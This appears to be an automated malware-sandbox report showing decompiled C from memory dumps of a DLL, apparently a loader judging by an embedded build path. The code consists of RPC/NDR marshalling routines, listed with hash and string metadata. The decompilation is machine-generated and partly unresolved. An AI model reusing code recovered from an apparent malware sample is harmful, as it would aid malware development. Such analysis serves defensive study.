                                                                                              								_t26 = E6F712658(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              							}
                                                                                              						}
                                                                                              						L9:
                                                                                              						return _t26;
                                                                                              					} else {
                                                                                              						return E6F712597(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                              					}
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: b7b421d0605aa24c798dea01504b04d2ce1791be9113d9c2b30ac512ff82a928
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: D601783200814EBBCF028E94CE01CEE3F2BBB29355B488525FE2858470D372D5B9EB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E6F705070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
                                                                                              				signed char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _t121;
                                                                                              				intOrPtr _t123;
                                                                                              				intOrPtr _t129;
                                                                                              				intOrPtr _t166;
                                                                                              				void* _t204;
                                                                                              				void* _t206;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                              				_v32 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				E6F7073B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t206 = _t204 + 0x18;
                                                                                              				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
                                                                                              					_t166 = _a4;
                                                                                              					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
                                                                                              					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
                                                                                              						_v36 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              						_v12 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              						 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              						E6F705070(_t212, _a4, _a8, _a12);
                                                                                              						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
                                                                                              						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              						_v32 = 1;
                                                                                              						0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
                                                                                              						_t206 = _t206 + 8;
                                                                                              						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
                                                                                              					}
                                                                                              				}
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v16 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                              				if(_v8 != 0) {
                                                                                              					_t129 = _a4;
                                                                                              					0x6f700000(_t129, _a12);
                                                                                              					_v40 = _t129;
                                                                                              					E6F70CC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                              					_t206 = _t206 + 0x18;
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				_t121 = E6F708B40(_a4, _a8, _a12, _v16);
                                                                                              				_a8 = _t121;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
                                                                                              					_t121 = E6F70CE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                              				if(_v32 == 0) {
                                                                                              					return _t121;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                              					_t123 = _a4;
                                                                                              					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
                                                                                              					return _t123;
                                                                                              				}
                                                                                              			}




















                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F70511E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                              • API String ID: 1319815426-1308788287
                                                                                              • Opcode ID: a2b6e62a2b53d3073c3d19b9e1da847cd986674872383a321c9ad1f7918b9f09
                                                                                              • Instruction ID: 8564d4ffdfedc379e4c9a5eb55b9e2dc607108cedbeae384df4c95b5b0b04630
                                                                                              • Opcode Fuzzy Hash: a2b6e62a2b53d3073c3d19b9e1da847cd986674872383a321c9ad1f7918b9f09
                                                                                              • Instruction Fuzzy Hash: 3781E5B4A00209EFDB08DF98D990AAE7BF5FF88314F108559E8189B345D335EA51CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 62%
                                                                                              			E6F703FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed int _v5;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				signed int _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _t96;
                                                                                              				intOrPtr _t110;
                                                                                              				void* _t172;
                                                                                              				void* _t173;
                                                                                              				void* _t176;
                                                                                              
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t173 = _t172 + 0x14;
                                                                                              				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
                                                                                              					_v5 = (_a12[1] & 0x000000ff) + 1;
                                                                                              					if(( *_a12 & 0x000000ff) != 0x1f) {
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v16 =  *_a12;
                                                                                              						_a12 =  &(_a12[4]);
                                                                                              						_v12 =  *_a12;
                                                                                              						_a12 =  &(_a12[4]);
                                                                                              					} else {
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v16 =  *_a12 & 0x0000ffff;
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              						_v12 =  *_a12 & 0x0000ffff;
                                                                                              						_a12 =  &(_a12[2]);
                                                                                              					}
                                                                                              					_v28 =  *_a12 & 0x0000ffff;
                                                                                              					_a12 =  &(_a12[2]);
                                                                                              					_a12 = E6F70A540(_v12, _a4, _a12, _v12);
                                                                                              					E6F7073D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                              					_t96 = E6F70AEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
                                                                                              					_t176 = _t173 + 0x1c;
                                                                                              					_v20 = _t96;
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						_a16 = 1;
                                                                                              					}
                                                                                              					_t133 = _a16 & 0x000000ff;
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						_t110 = E6F70A3B0(_t133, _a4, _v16);
                                                                                              						_t176 = _t176 + 8;
                                                                                              						 *_a8 = _t110;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F70AF00(_a4, _v20);
                                                                                              					E6F70C2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					E6F7100E0( *_a8 + _v32, _v24, _v20);
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}
















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                              • API String ID: 4104443479-658257468
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F705640(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				void* _t72;
                                                                                              				intOrPtr _t73;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				if(( *_a12 & 0x000000ff) != 0x21) {
                                                                                              					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					return  *0x6f700000(0x6e6);
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
                                                                                              					_v12 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F705640(_a4, _a8, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
                                                                                              					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					_v8 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
                                                                                              				}
                                                                                              				E6F70CC40(0x21, _a4, _a8, _a12);
                                                                                              				_t72 = E6F70CE70(0x21, _a4, _a8, _a12, 1);
                                                                                              				if(_v8 != 0) {
                                                                                              					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
                                                                                              					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
                                                                                              					return _t73;
                                                                                              				}
                                                                                              				return _t72;
                                                                                              			}











                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(00000001,?,?), ref: 6F705704
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$invalid format type %x
                                                                                              • API String ID: 3462415225-814374321
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E6F7034D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _t67;
                                                                                              				void* _t100;
                                                                                              				void* _t102;
                                                                                              				void* _t103;
                                                                                              
                                                                                              				_v12 = _a12[2] & 0x0000ffff;
                                                                                              				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				E6F7073D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
                                                                                              				_t102 = _t100 + 0x1c;
                                                                                              				_t71 = _a16 & 0x000000ff;
                                                                                              				if((_a16 & 0x000000ff) == 0) {
                                                                                              					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t67 = E6F70A3B0(_t71, _a4, _v12);
                                                                                              					_t102 = _t102 + 8;
                                                                                              					 *_a8 = _t67;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              				_v8 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              				E6F70AF00(_a4, _v12);
                                                                                              				_t103 = _t102 + 8;
                                                                                              				if(( *_a12 & 0x000000ff) == 0x16) {
                                                                                              					E6F70C2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
                                                                                              					_t103 = _t103 + 0x14;
                                                                                              				}
                                                                                              				0x6f700000("copying %p to %p\n", _v8,  *_a8);
                                                                                              				if( *_a8 != _v8) {
                                                                                              					E6F7100E0( *_a8, _v8, _v12);
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}









                                                                                              APIs
                                                                                              • _memmove.LIBCMT ref: 6F7035E7
                                                                                                • Part of subcall function 6F70A3B0: _memset.LIBCMT ref: 6F70A3CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove_memset
                                                                                              • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                              • API String ID: 3555123492-1064448161
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E6F70DCB4(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed short _t55;
                                                                                              				intOrPtr _t57;
                                                                                              				void* _t65;
                                                                                              				intOrPtr _t67;
                                                                                              				intOrPtr _t69;
                                                                                              				void* _t103;
                                                                                              				void* _t105;
                                                                                              				void* _t109;
                                                                                              				void* _t110;
                                                                                              
                                                                                              				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
                                                                                              				 *((intOrPtr*)(_t103 + 0x14)) = E6F70A440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
                                                                                              				 *((intOrPtr*)(_t103 + 0x14)) = E6F70A540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                              				_t55 =  *(_t103 + 0xc);
                                                                                              				0x6f700000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
                                                                                              				 *(_t103 - 8) = _t55;
                                                                                              				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
                                                                                              				_t57 = E6F70AEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                              				_t109 = _t105 + 0x24;
                                                                                              				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
                                                                                              				_t112 =  *(_t103 + 0x20) & 0x000000ff;
                                                                                              				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
                                                                                              					_push(0xab4);
                                                                                              					E6F70FA34(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
                                                                                              					_t109 = _t109 + 0xc;
                                                                                              				}
                                                                                              				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
                                                                                              					 *(_t103 + 0x18) = 1;
                                                                                              				}
                                                                                              				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
                                                                                              					_t69 = E6F70A3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
                                                                                              					_t109 = _t109 + 8;
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
                                                                                              				}
                                                                                              				E6F7073D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
                                                                                              				_t110 = _t109 + 8;
                                                                                              				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
                                                                                              				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
                                                                                              				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
                                                                                              				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
                                                                                              				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
                                                                                              					_t67 = E6F709560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
                                                                                              					_t110 = _t110 + 0x14;
                                                                                              					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
                                                                                              					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
                                                                                              				}
                                                                                              				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
                                                                                              				return _t65;
                                                                                              			}













                                                                                              APIs
                                                                                              • __wassert.LIBCMT ref: 6F70DD3B
                                                                                                • Part of subcall function 6F70FA34: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6F70FAF9
                                                                                                • Part of subcall function 6F70FA34: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6F70FB25
                                                                                              Strings
                                                                                              • C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c, xrefs: 6F70DD31
                                                                                              • fUnmarshall, xrefs: 6F70DD36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName__wassert
                                                                                              • String ID: C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                              • API String ID: 1832359313-3937532760
                                                                                              • Opcode ID: 1c2836db63b6b22b4646ba8b62aa11da1adf5c4a309604b02903cc780d6dae3e
                                                                                              • Instruction ID: 0810d1d6d54f0bfd4ccf177c1b6438a5dcd8175e27f27f1d4accbc0d90259614
                                                                                              • Opcode Fuzzy Hash: 1c2836db63b6b22b4646ba8b62aa11da1adf5c4a309604b02903cc780d6dae3e
                                                                                              • Instruction Fuzzy Hash: 5C4173F5A002499FCB04DF68D980A9E7BF5BF49308F148159FD19AB341E735EA11CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E6F704580(void* __eflags, signed int _a4, void* _a8, signed short* _a12, signed int _a16) {
                                                                                              				signed int _v5;
                                                                                              				signed char _v6;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v20;
                                                                                              				void* _t95;
                                                                                              				void* _t99;
                                                                                              
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_a12 =  &(_a12[0]);
                                                                                              				_v6 =  *_a12 & 0xf;
                                                                                              				_v5 = ( *_a12 & 0xf0) >> 4;
                                                                                              				_a12 =  &(_a12[0]);
                                                                                              				E6F7073D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
                                                                                              				_v16 = E6F70E930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
                                                                                              				0x6f700000("got switch value 0x%x\n", _v16);
                                                                                              				_t99 = _t95 + 0x2c;
                                                                                              				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f700000(_a4, _v12 & 0x0000ffff);
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					E6F710730( *_a8, 0, _v12 & 0x0000ffff);
                                                                                              					_t99 = _t99 + 0xc;
                                                                                              				}
                                                                                              				E6F7077F0(_a4, _a8,  &_v6, 0);
                                                                                              				_v20 = (_v5 & 0x000000ff) +  *_a8;
                                                                                              				return E6F70ED20(_a4,  &_v20, _v16, _a12, 0);
                                                                                              			}











                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                              • API String ID: 2102423945-3216196450
                                                                                              • Opcode ID: 1ab9564cdbb33b4128e5ee1096d1d5d3bf93eb5dc38091ac1d596aacd9433b4c
                                                                                              • Instruction ID: 7c12303768c4af15ca6e2b61b1e6fe63c21b1408417184849cbcc283ef0e488c
                                                                                              • Opcode Fuzzy Hash: 1ab9564cdbb33b4128e5ee1096d1d5d3bf93eb5dc38091ac1d596aacd9433b4c
                                                                                              • Instruction Fuzzy Hash: 354182F5904288ABCB04DFA4D850ABF7BB6AF89305F048199FD549B382D735EA10DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 21%
                                                                                              			E6F7099D4() {
                                                                                              				void* _t246;
                                                                                              				void* _t248;
                                                                                              				void* _t250;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
                                                                                              					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                              					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
                                                                                              					 *((intOrPtr*)(_t246 - 0x18)) = E6F70E3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
                                                                                              					0x6f700000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
                                                                                              					_t250 = _t248 + 0x14;
                                                                                              					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
                                                                                              						E6F710730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6f71b3d8 + ( *( *(_t246 - 8)) & 0x7f) * 4));
                                                                                              					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
                                                                                              						0x6f700000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
                                                                                              						_t250 = _t250 + 8;
                                                                                              					} else {
                                                                                              						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
                                                                                              							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
                                                                                              						} else {
                                                                                              							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
                                                                                              						}
                                                                                              					}
                                                                                              					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
                                                                                              					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                              					L1:
                                                                                              					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                              						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
                                                                                              						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
                                                                                              						if( *(_t246 - 0xc) > 0xb8) {
                                                                                              							L46:
                                                                                              							0x6f700000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
                                                                                              							_t250 = _t250 + 8;
                                                                                              							L47:
                                                                                              							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
                                                                                              							continue;
                                                                                              						}
